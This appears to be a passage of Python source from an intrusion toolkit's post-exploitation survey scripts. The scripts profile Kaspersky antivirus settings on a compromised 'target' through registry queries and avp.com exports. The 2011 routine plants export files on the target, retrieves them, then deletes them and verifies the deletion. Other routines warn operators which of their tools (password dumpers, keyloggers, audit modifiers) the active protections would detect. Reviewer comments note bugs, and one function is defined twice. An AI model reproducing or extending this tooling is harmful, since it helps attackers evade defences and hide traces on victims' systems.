def outputBinData(regLabel, regValue, kasXmlFilePtr):
    """Render one on/off registry setting to the console table and the XML log.

    regValue '1' maps to ENABLED, '0' to DISABLED, anything else to UNKNOWN.
    regLabel is written verbatim inside <setting_name> (no shared.xmlScrub,
    unlike the header fields the callers write); the console row pads the
    label to 30 columns with shared.padOutput.
    """
    kasXmlFilePtr.write('\t<setting>\n\t\t<setting_name>' + regLabel + '</setting_name>\n')
    paddedLabel = shared.padOutput(30, regLabel)
    state = 'ENABLED' if regValue == '1' else ('DISABLED' if regValue == '0' else 'UNKNOWN')
    shared.safePrint('|   %s   |   %s   |   %s' % (paddedLabel, regValue, state))
    kasXmlFilePtr.write('\t\t<setting_value>' + state + '</setting_value>\n\t</setting>\n')
def outputBinData(regLabel, regValue, kasXmlFilePtr):
    """Write a boolean setting as a <setting> element and a padded console row.

    Only the string values '1' and '0' are recognised (ENABLED / DISABLED);
    every other value is reported as UNKNOWN. The label goes into the XML
    unescaped, so callers are expected to pass plain constant labels.
    """
    state = 'UNKNOWN'
    if regValue == '1':
        state = 'ENABLED'
    elif regValue == '0':
        state = 'DISABLED'
    xmlOpen = '\t<setting>\n\t\t<setting_name>' + regLabel + '</setting_name>\n'
    xmlClose = '\t\t<setting_value>' + state + '</setting_value>\n\t</setting>\n'
    kasXmlFilePtr.write(xmlOpen)
    shared.safePrint('|   %s   |   %s   |   %s' % (shared.padOutput(30, regLabel), regValue, state))
    kasXmlFilePtr.write(xmlClose)
def kasVerEleven(kasName, kasDescription, kasVersion, kasRoot):
    """Collect Kaspersky 2011 settings from avp.com exports instead of the registry.

    If the product name contains "ANTI" it is treated as antivirus-only and the
    function returns True without doing anything else. Otherwise it loops four
    times, running ``avp.com export rtp`` / ``export fw`` on the target into
    ``~klset.txt`` and ``~klset.dat`` under ``<windir>\\temp``, retrieves each file
    with ``foreground get``, appends the two .txt exports into ``<logs>\\kastemp.txt``
    locally, deletes the remote copy, and finally parses the concatenated text
    with regexes into ``<logs>\\kasperskyfile.xml`` and a console summary.

    Returns False (bails out) if one of the export files already exists in the
    target temp dir, True otherwise. kasDescription is accepted but unused.

    NOTE(review): the XML handle opened below is only closed by the outer
    ``finally`` at the end of this branch, so the early ``return False`` leaves it
    open and the document without its root element; ``getFile`` and
    ``fwActionBlock`` are read on paths where they may never have been assigned;
    and the ``'.*no.*'`` / ``'.*yes.*'`` regexes match those substrings anywhere in
    a line, not just the setting's value.
    """
    if re.match('.*ANTI.*', kasName.upper()):
        shared.safePrint(
            '|   IT APPEARS TO BE ANTI-VIRUS ONLY...  YOU DO NOT NEED ME.')
        shared.safePrint(
            '+---------------------------------------------------------------------------------'
        )
        kasFlavor = 'ANTIVIRUS'
    else:
        kasFlavor = 'SECURITY'
        logDir = dsz.lp.GetLogsDirectory()
        copyCmd = 'cmd /C copy '  # unused in this function
        # NOTE(review): closed only in the finally block at the bottom of this
        # branch; the "return False" inside the loop below skips that.
        kasXmlFilePtr = open((logDir + '\\kasperskyfile.xml'), 'w')
        shared.safePrint(
            '|   THIS NEW VERSION OF THE KASPERSKY 2011 SCRIPT USES DATA RETRIEVED FROM THE'
        )
        shared.safePrint(
            '|   ACTUAL KASPERSKY PROCESS; IT DOES NOT QUERY THE REGISTRY ANYMORE.'
        )
        shared.safePrint(
            '|   THIS MEANS THAT WE WILL CREATE FOUR FILES ON TARGET, DOWNLOAD THEM, AND DELETE'
        )
        shared.safePrint(
            '|   THEM.  PLEASE ENSURE THAT THE SCRIPT REMOVES THESE FILES CORRECTLY.'
        )
        shared.safePrint(
            '|   GENERALLY SPEAKING, THESE FILES COMBINED ARE TYPICALLY LESS THAN 500K.'
        )
        shared.safePrint(
            '|   IF THERE IS A GOOD REASON NOT TO CREATE AND DOWNLOAD THESE FILES, PLEASE'
        )
        shared.safePrint(
            '|   QUIT OUT OF THIS SCRIPT AND MANUALLY CHECK REGISTRY SETTINGS.'
        )
        shared.safePrint(
            '+---------------------------------------------------------------------------------'
        )
        shared.safePrint(
            '|                        ***** NEW FOR VERSION 2011 ****')
        shared.safePrint(
            '|   KASPERSKY 2011 DOES NOT ALLOW FOR THE SIMPLE EXFIL OF DATA TO A SINGLE FILE.'
        )
        shared.safePrint(
            '|   AS SUCH, WE MUST CREATE 4 FILES ON TARGET (2xTXT 2xDAT), RETRIEVE THEM,'
        )
        shared.safePrint(
            '|   CONCATENATE THEM LOCALLY, AND FINALLY, PARSE THEM.')
        shared.safePrint(
            '|   THIS IS NOT A QUICK PROCESS AND WILL LIKELY TAKE ~5-10 MINUTES.'
        )
        shared.safePrint(
            '|                        ***** PATIENCE IS A VIRTUE *****')
        shared.safePrint(
            '+---------------------------------------------------------------------------------'
        )
        dsz.ui.Pause(
            'DO YOU WISH TO CONTINUE AND CREATE/GET THE KASPERSKY SETTINGS FILES? (REQUIRED TO CONTINUE)'
        )
        (tarWinDir, tarSysDir) = dsz.path.windows.GetSystemPaths()
        tarTempDir = (tarWinDir + '\\temp')
        kasOutFile = ''
        exportType = ''
        dsz.control.echo.Off()
        # Local scratch file that the two .txt exports get appended to.
        tempFileName = (logDir + '\\kastemp.txt')
        devNull = ''  # unused in this function
        # Truncate/create the local scratch file before the loop appends to it.
        tempCmd = (('local run -command "cmd /C type NUL > ' + tempFileName) +
                   '" -redirect')
        dsz.cmd.Run(tempCmd)
        # i = 0: rtp/.txt, 1: rtp/.dat, 2: fw/.txt, 3: fw/.dat -- exportType is
        # only set on i == 0 and i == 2 and carries over to the next iteration.
        for i in range(4):
            if (i == 0):
                exportType = 'rtp'
            if (i == 2):
                exportType = 'fw'
            if ((i % 2) == 0):
                kasOutFile = '~klset.txt'
            else:
                kasOutFile = '~klset.dat'
            # Refuse to overwrite a pre-existing export file; bail out entirely.
            if dsz.file.Exists(kasOutFile, tarTempDir):
                shared.safePrint(
                    '+---------------------------------------------------------------------------------'
                )
                shared.safePrint(
                    ('|\t!!!FILE %s\\%s MAY ALREADY EXIST ON TARGET!!!' %
                     (tarTempDir, kasOutFile)))
                shared.safePrint(
                    '|\t!!!SEEK HELP IMMEDIATELY!!!   !!!BAILING FROM SCRIPT!!!'
                )
                shared.safePrint('|\t!!!SEE BELOW DIR COMMAND OUTPUT!!!')
                shared.safePrint(
                    '+---------------------------------------------------------------------------------'
                )
                dsz.cmd.Run(((('dir ' + tarTempDir) + '\\') + kasOutFile))
                # NOTE(review): kasXmlFilePtr is still open here and the file has
                # no content yet; nothing closes it on this path.
                return False
            else:
                shared.safePrint(
                    '+---------------------------------------------------------------------------------'
                )
                shared.safePrint(
                    ('|   CREATING FILE %d OF 4 ON TARGET....' % (i + 1)))
                # Builds: run -command "\"<kasRoot>\avp.com\" export <type> \"<temp>\<file>\"" -redirect
                if dsz.cmd.Run((((((
                    ((('run -command "\\"' + kasRoot) + '\\avp.com\\" export ')
                     + exportType) + ' \\"') + tarTempDir) + '\\') +
                                 kasOutFile) + '\\"" -redirect')):
                    shared.safePrint(
                        ('|     SUCCESSFULLY CREATED %s\\%s ON TARGET' %
                         (tarTempDir, kasOutFile)))
                    dsz.cmd.Run(((('foreground get ' + tarTempDir) + '\\') +
                                 kasOutFile), dsz.RUN_FLAG_RECORD)
                    # NOTE(review): getFile is bound only on this success branch,
                    # but the "type ... >>" below reads it unconditionally, so a
                    # failed export on an even iteration raises NameError (or
                    # reuses the previous iteration's value).
                    [getFile] = dsz.cmd.data.Get('filelocalname::localname',
                                                 dsz.TYPE_STRING)
                # Only the .txt exports (even i) are appended to the local scratch file.
                if ((i % 2) == 0):
                    tempCmd = ((((
                        (('local run -command "cmd /C type ' + logDir) +
                         '\\GetFiles\\') + getFile) + ' >> ') + tempFileName) +
                               '" -redirect')
                    dsz.cmd.Run(tempCmd)
                if dsz.cmd.Run(((('del ' + tarTempDir) + '\\') + kasOutFile)):
                    shared.safePrint(
                        ('|     SUCCESSFULLY DELETED %s\\%s ON TARGET' %
                         (tarTempDir, kasOutFile)))
                    # Double-check the delete actually took effect.
                    if dsz.file.Exists(kasOutFile, tarTempDir):
                        shared.safePrint((
                            'PLEASE CHECK THE STATUS OF THE FILE %s\\%s ON TARGET!!!'
                            % (tarTempDir, kasOutFile)))
                        dsz.ui.Pause((
                            '!!! VERIFY THAT THE FILE %s\\%s IS NOT ON TARGET!!!'
                            % (tarTempDir, kasOutFile)))
                    else:
                        shared.safePrint((
                            '|     VERIFIED DELETION OF FILE %s\\%s FROM TARGET'
                            % (tarTempDir, kasOutFile)))
                        # NOTE(review): after a verified deletion a "dir" of the
                        # file is expected to fail; the message printed when it
                        # returns 0 reads as an error although that is the
                        # normal outcome here -- confirm intent.
                        if (dsz.cmd.Run(((('dir ' + tarTempDir) + '\\') +
                                         kasOutFile)) == 0):
                            shared.safePrint('|   DIRECTORY LISTING FAILED')
                else:
                    shared.safePrint(
                        ('FAILED TO DELETE %s FROM TARGET' % kasOutFile))
                    dsz.ui.Pause(
                        ('!!! VERIFY THAT THE FILE %s/%s IS NOT ON TARGET!!!' %
                         (tarTempDir, kasOutFile)))
        shared.safePrint(
            '+---------------------------------------------------------------------------------'
        )
        dsz.ui.Pause(
            'PLEASE CHECK THE ABOVE OUTPUTS TO ENSURE ALL FILES WERE DELETED.')
        # Everything from here on is local parsing of the concatenated .txt
        # exports; the outer finally terminates and closes the XML document.
        try:
            kasXmlFilePtr.write('<kaspersky_settings>\n')
            kasXmlFilePtr.write('<vendor>KASPERSKY</vendor>\n')
            kasXmlFilePtr.write(
                (('<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
            kasXmlFilePtr.write((('<description>' + shared.xmlScrub(kasName)) +
                                 '</description>\n'))
            kasXmlFilePtr.write(
                (('<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
            shared.safePrint(('|  ATTEMPTING TO OPEN FILE: ' + tempFileName))
            kasFilePtr = open(tempFileName)
            # Section flags: set when a "+ SW2" / "+ ...Firewall" / "+ ...Resource"
            # header line is seen, consumed (reset) by the next matching line.
            swLevel = 0
            fwLevel = 0
            inRegGuard = 0
            fireWallStatus = 'UNKNOWN'
            allPortMonitoring = 'UNKNOWN'
            fileSystemMonitor = 'UNKNOWN'
            logRegEvents = 'UNKNOWN'
            logNonCrit = 'UNKNOWN'
            sysAccountWatch = 'UNKNOWN'
            printFlag = False  # unused in this function
            try:
                for line in kasFilePtr:
                    if re.match('.*[+] SW2.*', line):
                        swLevel = 1
                    if (re.match('.*enabled.*', line) and (swLevel == 1)):
                        # NOTE(review): '.*yes.*' / '.*no.*' match those substrings
                        # anywhere in the line (same for the LogFiles/LogReg/
                        # FullReport checks below).
                        if re.match('.*yes.*', line):
                            sysAccountWatch = 'ENABLED'
                        elif re.match('.*no.*', line):
                            sysAccountWatch = 'DISABLED'
                        kasXmlFilePtr.write(
                            (('<sys_acc_watch>' +
                              shared.xmlScrub(sysAccountWatch)) +
                             '</sys_acc_watch>\n'))
                        swLevel = 0
                    if re.match('.*LogFiles.*', line):
                        fileSystemMonitor = 'ENABLED'
                        if re.match('.*no.*', line):
                            fileSystemMonitor = 'DISABLED'
                        kasXmlFilePtr.write(
                            (('<file_sys_logging>' +
                              shared.xmlScrub(fileSystemMonitor)) +
                             '</file_sys_logging>\n'))
                    if re.match('.*LogReg.*', line):
                        logRegEvents = 'ENABLED'
                        if re.match('.*no.*', line):
                            logRegEvents = 'DISABLED'
                        kasXmlFilePtr.write((('<reg_event_logging>' +
                                              shared.xmlScrub(logRegEvents)) +
                                             '</reg_event_logging>\n'))
                    if re.match('.*FullReport.*', line):
                        logNonCrit = 'ENABLED'
                        if re.match('.*no.*', line):
                            logNonCrit = 'DISABLED'
                        kasXmlFilePtr.write((('<noncrit_event_logging>' +
                                              shared.xmlScrub(logNonCrit)) +
                                             '</noncrit_event_logging>\n'))
                    # NOTE(review): '.$.*' anchors at end-of-line and then allows
                    # only a trailing newline; '.*Firewall.*' was probably
                    # intended (same pattern for the Resource header below).
                    if re.match('.*[+].*Firewall.$.*', line):
                        fwLevel = 1
                    if ((1 == fwLevel) and re.match('.*enabled.*', line)):
                        if re.match('.*no.*', line):
                            fireWallStatus = 'DISABLED'
                        else:
                            fireWallStatus = 'ENABLED'
                        kasXmlFilePtr.write(
                            (('<firewall_status>' +
                              shared.xmlScrub(fireWallStatus)) +
                             '</firewall_status>\n'))
                        fwLevel = 0
                    if re.match('.*AllPorts.*', line):
                        if re.match('.*yes.*', line):
                            allPortMonitoring = 'ENABLED'
                        else:
                            allPortMonitoring = 'DISABLED'
                    # NOTE(review): fwActionBlock is bound only here; the
                    # lateKasFw call below raises NameError if a rule line
                    # precedes the first vRuleList_vcontent line.
                    if re.match('.*vRuleList_vcontent.*', line):
                        splitFw = line.split(' ')
                        fwActionBlock = splitFw[2]
                    # Hex-encoded firewall rule blob; shared.lateKasFw parses it.
                    m = re.match('.*?([0-9a-fA-F]{4}07268930.*0801816089).*?',
                                 line)
                    if m:
                        fwRules = m.group(1)
                        shared.lateKasFw(fwRules, kasXmlFilePtr, fwActionBlock)
                    if re.match('.*[+].*Resource.$.*', line):
                        inRegGuard = 1
                    if (re.match('.*Childs_vcontent.*', line)
                            and (inRegGuard == 1)):
                        shared.lateKasRegRules(line, kasXmlFilePtr)
                        inRegGuard = 0
                    if re.match('.*4b4c41707054727573746564.*', line):
                        shared.lateKasAppRules(line, kasXmlFilePtr)
                regGetGmd = ''  # unused (looks like a typo of regGetCmd)
                # NOTE(review): despite the banner above saying the registry is
                # no longer queried, the port list still comes from the registry.
                regGetCmd = 'registryquery -hive l -key SOFTWARE\\KasperskyLab\\protected\\AVP11\\profiles\\TrafficMonitor\\settings\\ -value Ports_vcontent'
                dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD)
                [regValue] = dsz.cmd.data.Get('key::value::value',
                                              dsz.TYPE_STRING)
                shared.lateKasPortMon(regValue, kasXmlFilePtr)
                kasXmlFilePtr.write(
                    (('<allport_monitoring>' + allPortMonitoring) +
                     '</allport_monitoring>'))
                shared.safePrint(
                    '+----------------------------------------------------------------------------------+'
                )
                shared.safePrint(
                    '| GENERAL PSP STATUS:                                                              |'
                )
                shared.safePrint(
                    '+----------------------------------------------------------------------------------+'
                )
                shared.safePrint(
                    ('|      FIREWALL IS:                       %s' %
                     fireWallStatus))
                shared.safePrint(
                    ('|      PORT MONITORING ON ALL PORTS IS:   %s' %
                     allPortMonitoring))
                shared.safePrint(
                    ('|      FILE SYSTEM MONITORING:            %s' %
                     fileSystemMonitor))
                shared.safePrint(
                    ('|      SYSTEM ACCOUNT WATCHING IS:        %s' %
                     sysAccountWatch))
                shared.safePrint(
                    ('|      NON-CRITICAL EVENT LOGGING IS:     %s' %
                     logNonCrit))
                shared.safePrint(
                    ('|      LOGGING OF REGISTRY EVENTS IS:     %s' %
                     logRegEvents))
                shared.safePrint(
                    '+----------------------------------------------------------------------------------+'
                )
            finally:
                kasFilePtr.close()
        finally:
            kasXmlFilePtr.write('</kaspersky_settings>\n')
            kasXmlFilePtr.close()
    return True
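def kasVerSix(kasName, kasDescription, kasVersion, kasRoot):
    """Quick review of Kaspersky 6 (Windows Workstations) settings via registry queries.

    Console output goes through shared.safePrint; a parallel XML record is
    written to ``<logs>\\kasperskyfile.xml``. Each on/off setting is fetched with
    shared.basicRegquery and rendered by outputBinData; the firewall protection
    level and the per-port monitoring table are handled inline. Settings whose
    value is '1' append a line to the "do not do this" list printed at the end.

    Args:
        kasName, kasVersion, kasRoot: written (xmlScrub'd) into the XML header.
        kasDescription: kept for signature parity with the other kasVer*
            handlers; unused here.

    Returns:
        True. There is no failure path: a failed registry query is reported on
        the console and the remaining checks still run.
    """
    doNotRun = '|   YAK'
    logDir = dsz.lp.GetLogsDirectory()
    # The context manager closes the XML log on every exit path, and the root
    # element is closed after the port-monitoring section whether or not that
    # query succeeded (previously only on the success branch, so a failed query
    # left the document unterminated).
    with open((logDir + '\\kasperskyfile.xml'), 'w') as kasXmlFilePtr:
        kasXmlFilePtr.write('<kaspersky_settings>\n')
        kasXmlFilePtr.write('\t<vendor>KASPERSKY</vendor>\n')
        kasXmlFilePtr.write((('\t<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
        kasXmlFilePtr.write((('\t<description>' + shared.xmlScrub(kasName)) + '</description>\n'))
        kasXmlFilePtr.write((('\t<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
        shared.safePrint('+---------------------------------------------------------------------------------')
        shared.safePrint('|   THE SCRIPT HAS IDENTIFIED KASPERSKY VERSION 6 FOR WINDOWS WORKSTATIONS.')
        shared.safePrint('|   THIS VERSION OF THE KASPERSKY SCRIPT USES REGISTRY QUERIES, BUT IS ONLY')
        shared.safePrint('|   A QUICK AND DIRTY REVIEW OF THE SETTINGS.')
        shared.safePrint('+------------------------------------+-------+------------------------------------')
        dsz.control.echo.Off()
        shared.safePrint(('|   %s   %s %s' % (shared.padOutput(30, 'SETTING'), '| VALUE', '|   STATUS')))
        shared.safePrint('+------------------------------------+-------+------------------------------------')
        # Dump the whole profiles tree first so the raw values sit in the log
        # next to the summarized table that follows.
        regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles -recursive'
        if (not dsz.cmd.Run(regGetCmd)):
            shared.safePrint('!!!RECURSIVE REGISTRY QUERY FAILED!!!')
        profilesKey = 'registryquery -hive l -key software\\Kasperskylab\\avp6\\profiles\\'
        pdmKey = profilesKey + 'Behavior_Blocking\\profiles\\pdm\\settings'
        # (query suffix, console/XML label, note appended to doNotRun when the
        # value is '1', or None). Order matters: it is the console output order.
        binSettings = [
            (profilesKey + 'Behavior_Blocking -value enabled',
             'BEHAVIOR BLOCKING:', None),
            (profilesKey + 'Anti_Hacker\\profiles\\fw -value enabled',
             'FIREWALL STATUS:', None),
        ]
        for regGetCmd, regLabel, note in binSettings:
            regValue = shared.basicRegquery(regGetCmd)
            if note is not None and regValue == '1':
                doNotRun = doNotRun + note
            outputBinData(regLabel, regValue, kasXmlFilePtr)
        # Firewall protection level is a 1..4 enum rather than a boolean.
        regGetCmd = profilesKey + 'Anti_Hacker\\profiles\\fw\\settings -value protectionlevel'
        regValue = shared.basicRegquery(regGetCmd)
        kasXmlFilePtr.write('\t<setting>\n\t\t<setting_name>Firewall Protection Level</setting_name>\n')
        if (regValue == '1'):
            shared.safePrint(('|   FIREWALL PROTECTION:             |   %s   |   !!!HIGH SECURITY!!! (THIS IS BAD)' % regValue))
            kasXmlFilePtr.write('\t\t<setting_value>High Security</setting_value>\n\t</setting>\n')
        elif (regValue == '2'):
            shared.safePrint(('|   FIREWALL PROTECTION:             |   %s   |   !!!TRAINING MODE!!! (THIS IS BAD)' % regValue))
            kasXmlFilePtr.write('\t\t<setting_value>Training Mode</setting_value>\n\t</setting>\n')
        elif (regValue == '3'):
            shared.safePrint(('|   FIREWALL PROTECTION:             |   %s   |   LOW SECURITY' % regValue))
            kasXmlFilePtr.write('\t\t<setting_value>Low Security</setting_value>\n\t</setting>\n')
        elif (regValue == '4'):
            shared.safePrint(('|   FIREWALL PROTECTION:             |   %s   |   OFF' % regValue))
            kasXmlFilePtr.write('\t\t<setting_value>off</setting_value>\n\t</setting>\n')
        else:
            kasXmlFilePtr.write('\t\t<setting_value>Unknown</setting_value>\n\t</setting>\n')
            shared.safePrint(('FIREWALL PROTECTION:                 |   %s   |   (!!!UNKNOWN!!!)' % regValue))
        binSettings = [
            (pdmKey + ' -value bWatchSystemAccount',
             'SYSTEM ACCOUNT WATCHING:', None),
            (pdmKey + ' -value bBehaviourEnabled',
             'APP ACTIVITY MONITOR:', None),
            (pdmKey + ' -value bRegMonitoring_Enabled',
             'REGISTRY MONITOR:', '\n|   POKING HOLES IN THE FIREWALL'),
            (pdmKey + '\\Set\\0000 -value bEnabled',
             'DANGEROUS BEHAVIOR MONITOR:', None),
            (pdmKey + '\\Set\\0002 -value bEnabled',
             'PROCESS INJECTION PROTECTION:', '\n|   RUNASCHILD, RUNASSYSTEM, PWDUMP, OR MODIFYAUDIT'),
            (pdmKey + '\\Set\\0003 -value bEnabled',
             'PROCESS HIDING PROTECTION:', '\n|   HIDING PROCESSES'),
            (pdmKey + '\\Set\\0007 -value bEnabled',
             'KEYLOGGER DETECTION:', None),
            (profilesKey + 'Web_Monitoring\\profiles\\httpscan\\ -value enabled',
             'HTTP PORT LOGGING:', None),
            (profilesKey + 'TrafficMonitor\\settings\\ -value DecodeSSL',
             'DECODE SSL:', None),
        ]
        for regGetCmd, regLabel, note in binSettings:
            regValue = shared.basicRegquery(regGetCmd)
            if note is not None and regValue == '1':
                doNotRun = doNotRun + note
            outputBinData(regLabel, regValue, kasXmlFilePtr)
        shared.safePrint('+------------------------------------+-------+------------------------------------')
        shared.safePrint('|    PORT MONITORING:')
        regGetCmd = profilesKey + 'TrafficMonitor\\settings\\def\\ports\\ -recursive'
        if dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD):
            regName = dsz.cmd.data.Get('key::value::name', dsz.TYPE_STRING)
            regValue = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
            shared.safePrint('|      +--------+----------------------+---------+')
            shared.safePrint('|      | PORT   |    DESCRIPTION       |MONITORED|')
            shared.safePrint('|      +--------+----------------------+---------+')
            kasXmlFilePtr.write('\t<monitored_ports>\n')
            for i in range(len(regName)):
                if (regName[i] == 'enabled'):
                    # NOTE(review): assumes each port key yields (port, description,
                    # ..., enabled) with the port three values before 'enabled';
                    # for i < 3 the negative index silently reads from the end of
                    # the list instead of failing -- confirm the query layout.
                    portValue = regValue[(i - 3)]
                    portDesc = regValue[(i - 2)]
                    if (regValue[i] == '1'):
                        portEnabled = 'TRUE'
                        kasXmlFilePtr.write((('\t\t<monitored_port>' + portValue) + '</monitored_port>\n'))
                    else:
                        portEnabled = 'FALSE'
                    # Fixed-width columns (6 / 20 / 7), same widths the old
                    # character-at-a-time padding loops produced.
                    shared.safePrint(('|      | %s | %s | %s |' % (portValue.ljust(6), portDesc.ljust(20), portEnabled.ljust(7))))
            shared.safePrint('|      +--------+----------------------+---------+')
            shared.safePrint('+---------------------------------------------------------------------------------')
            kasXmlFilePtr.write('\t</monitored_ports>\n')
        else:
            shared.safePrint('PORT MONITORING REGISTRY QUERY FAILED')
        kasXmlFilePtr.write('</kaspersky_settings>\n')
    shared.safePrint('| !!!WARNING!!! BASED ON THE ABOVE SETTINGS, DOING THE FOLLOWING WOULD BE STUPID:')
    shared.safePrint('+---------------------------------------------------------------------------------')
    shared.safePrint(doNotRun)
    shared.safePrint('+---------------------------------------------------------------------------------')
    return True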
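def kasVerSixMp4(kasName, kasDescription, kasVersion, kasRoot):
    """Quick review of Kaspersky 6 MP4 (avp80 registry layout) settings.

    The IDS/behaviour-blocking rules are queried through shared.compRegQuery,
    which prints one table row per rule and returns a truthy value when the
    rule is active; for a few rules that also appends a line to the "do not do
    this" list printed at the end. Firewall status/level and the monitored-port
    table are read directly with registryquery. A parallel XML record is written
    to ``<logs>\\kasperskyfile.xml``.

    Args:
        kasName, kasVersion, kasRoot: written (xmlScrub'd) into the XML header.
        kasDescription: kept for signature parity with the other kasVer*
            handlers; unused here.

    Returns:
        True. Query failures are reported on the console and do not abort.
    """
    doNotRun = '|  RUNNING PWDUMP OR MODIFYAUDIT IF YOU ARE AN EXECUTABLE'
    logDir = dsz.lp.GetLogsDirectory()
    # The context manager closes the XML log on every exit path; the
    # <monitored_ports> and root elements are closed at the end (previously a
    # second opening <kaspersky_settings> tag was written instead of the
    # closing tags, producing malformed XML).
    with open((logDir + '\\kasperskyfile.xml'), 'w') as kasXmlFilePtr:
        kasXmlFilePtr.write('<kaspersky_settings>\n')
        kasXmlFilePtr.write('\t<vendor>KASPERSKY</vendor>\n')
        kasXmlFilePtr.write((('\t<version>' + shared.xmlScrub(kasVersion)) + '</version>\n'))
        kasXmlFilePtr.write((('\t<description>' + shared.xmlScrub(kasName)) + '</description>\n'))
        kasXmlFilePtr.write((('\t<root>' + shared.xmlScrub(kasRoot)) + '</root>\n'))
        shared.safePrint('+---------------------------------------------------------------------------------')
        shared.safePrint('|   THE SCRIPT HAS IDENTIFIED KASPERSKY VERSION 6 FOR WINDOWS WORKSTATIONS MP4.')
        shared.safePrint('|   THIS VERSION OF THE KASPERSKY SCRIPT USES REGISTRY QUERIES, BUT IS ONLY')
        shared.safePrint('|   A QUICK AND DIRTY REVIEW OF THE SETTINGS.')
        shared.safePrint('+---------------------------------------------------------------------------------')
        dsz.control.echo.Off()
        # Dump the whole profiles tree first so the raw values sit in the log
        # next to the summarized table that follows.
        regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles -recursive'
        dsz.cmd.Run(regGetCmd)
        shared.safePrint('+------------------------------------------+------------+------------+-----------+')
        shared.safePrint((((((((('| ' + shared.padOutput(40, 'IDS RULE DESCRIPTION')) + ' | ') + shared.padOutput(10, 'STATUS')) + ' | ') + shared.padOutput(10, 'LOGGING')) + ' | ') + shared.padOutput(10, 'ACTION')) + '|'))
        shared.safePrint('+------------------------------------------+------------+------------+-----------+')
        bbKey = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\Behavior_Blocking2\\profiles\\'
        # (key suffix, rule label, note appended to doNotRun when the rule is
        # active, or None). Order matters: it is the console output order.
        idsRules = [
            ('regguard2', 'REGISTRY GUARD',
             '\n|  LISTENING ON TARGET PORTS\n|  RUNNING HANDLE\n|  UNINSTALLING YAK OR DARKSKYLINE'),
            ('pdm2\\settings\\set\\0015', 'SUSPICIOUS DNS REQUEST PROTECTION',
             '\n|  RUNNING NETMAP IF YOU ARE AN EXECUTABLE'),
            ('pdm2\\settings\\set\\0000', 'P2P WORM PROTECTION', None),
            ('pdm2\\settings\\set\\0001', 'TROJAN PROTECTION', None),
            ('pdm2\\settings\\set\\0002', 'KEY LOGGER PROTECTION', '\n|  RUNNING YAK'),
            ('pdm2\\settings\\set\\0003', 'HIDDEN DRIVER PROTECTION', None),
            ('pdm2\\settings\\set\\0004', 'KERNEL MODIFICATION PROTECTION', None),
            ('pdm2\\settings\\set\\0005', 'HIDDEN OBJECT PROTECTION', None),
            ('pdm2\\settings\\set\\0006', 'HIDDEN PROCESS PROTECTION', None),
            ('pdm2\\settings\\set\\0008', 'FILE MODIFICATION PROTECTION', None),
            ('pdm2\\settings\\set\\0010', 'PROCESS INTRUSION PROTECTION', None),
            ('pdm2\\settings\\set\\0011', 'IO REDIRECTION PROTECTION', None),
            ('pdm2\\settings\\set\\0012', 'SUSPICIOUS REGISTRY ACCESS PROTECTION', None),
            ('pdm2\\settings\\set\\0013', 'DATA XFER USING TRUSTED APP PROTECTION', None),
            ('pdm2\\settings\\set\\0014', 'SUSPICIOUS SYSTEM ACTIVITY MONITOR', None),
            ('pdm2\\settings\\set\\0016', 'PROTECTED STORAGE ACCESS PROTECTION', None),
        ]
        for keySuffix, ruleLabel, note in idsRules:
            # compRegQuery is always called (it prints the row); only its result
            # for the rules that carry a note affects doNotRun.
            if shared.compRegQuery(bbKey + keySuffix, ruleLabel, kasXmlFilePtr) and note is not None:
                doNotRun = doNotRun + note
        shared.safePrint('+------------------------------------------+------------+------------+-----------+')
        shared.safePrint('|  FIREWALL SETTINGS')
        shared.safePrint('+--------------------------------------------------------------------------------+')
        regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\AVP80\\profiles\\Anti_Hacker\\profiles\\fw\\ -value enabled'
        dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD)
        regValue = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
        # An empty result (value missing / query failed) used to raise IndexError
        # on regValue[0]; treat it as UNKNOWN instead.
        fwEnabled = regValue[0] if regValue else ''
        if ('0' == fwEnabled):
            shared.safePrint('|   FIREWALL STATUS:                DISABLED')
        elif ('1' == fwEnabled):
            shared.safePrint('|   FIREWALL STATUS:                ENABLED')
        else:
            shared.safePrint('|   FIREWALL STATUS:                UNKNOWN')
        regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\AVP80\\profiles\\Anti_Hacker\\profiles\\fw\\settings -value protectionlevel'
        dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD)
        regValue = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
        fwLevel = regValue[0] if regValue else ''
        # protectionlevel is a 1..4 enum (the old chain tested '2' twice).
        fwSetting = {
            '1': 'HIGH',
            '2': 'TRAINING MODE',
            '3': 'LOW',
            '4': 'OFF',
        }.get(fwLevel, 'UNKNOWN')
        shared.safePrint(('|   PROTECTION LEVEL:               %s (%s)' % (fwSetting, fwLevel)))
        regGetCmd = 'registryquery -hive l -key software\\Kasperskylab\\protected\\avp80\\profiles\\TrafficMonitor\\settings\\Ports\\ -recursive'
        dsz.cmd.Run(regGetCmd, dsz.RUN_FLAG_RECORD)
        try:
            regName = dsz.cmd.data.Get('key::value::name', dsz.TYPE_STRING)
            regValue = dsz.cmd.data.Get('key::value::value', dsz.TYPE_STRING)
        except Exception:
            # Empty lists so the port loop below is simply skipped. (The old
            # handler assigned a misspelled regVal, leaving regValue unbound.)
            regName = []
            regValue = []
            shared.safePrint('+--------------------------------------------------------------------------------+')
            shared.safePrint('|  !!!ERROR CHECKING TrafficMonitor (PORT) SETTINGS; PROCEED WITH CAUTION!!!')
            shared.safePrint('+--------------------------------------------------------------------------------+')
        shared.safePrint('|   PORT MONITORING:')
        shared.safePrint('|      +--------+----------------------+---------+')
        shared.safePrint('|      | PORT   |    DESCRIPTION       |MONITORED|')
        shared.safePrint('|      +--------+----------------------+---------+')
        kasXmlFilePtr.write('\t<monitored_ports>\n')
        for i in range(len(regName)):
            if (regName[i] == 'Description'):
                # NOTE(review): assumes each port key yields (enabled, port,
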